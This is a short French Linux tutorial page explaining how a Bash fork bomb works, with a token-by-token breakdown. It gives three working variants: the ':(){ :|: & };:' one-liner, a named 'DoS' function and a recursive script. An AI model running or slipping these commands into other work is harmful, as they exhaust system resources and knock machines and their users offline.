Math-Linux.com

Knowledge base dedicated to Linux and applied mathematics.

Accueil > Linux > Commande du jour > Comment faire un déni de service en BASH à l’aide de fork ?

Comment faire un déni de service en BASH à l’aide de fork ?

Toutes les versions de cet article : [English] [français]

Les exemples suivants doivent àªtre utilisés avec précaution., math-linux.com n’est aucunement responsable de dommages éventuels causés ou de l’éventuel reboot de votre poste ou serveur.

En informatique, une attaque par déni de service (DoS) ou déni de service distribué (DDoS) est une tentative de rendre les ressources utilisateurs/réseaux indisponibles.

Fonctions et fork Bash

[root@kali ] :(){ :|: & };:

Entrée et BOUM !!!
Kesako ?
-  :( ) est le nom de la fonction  :
- { début de fonction  :
-  : appel récursif en mémoire de la fonction  :
- | sortie redirigée vers une autre copie de  :
- & sortie en background, si la première instance de  : est reniée, la seconde sera persistente
- } fin de la fonction  :
-  : appel de la fonction  :

A noter que cette ligne de commande peut-àªtre écrite comme suit :

[root@kali ] DoS(){ DoS|DoS & };DoS

Appel récursif d’un script

En utilisant la màªme idée que précédemment, vous pouvez créer un exécutable
DoS avec un appel récursif :

[root@kali ] chmod +x DoS
[root@kali ] cat DoS
#!/bin/bash
./DoS& ./DoS
[root@kali ] ./DoS

BOUM !!!

Un message, un commentaire ?

comments powered by Disqus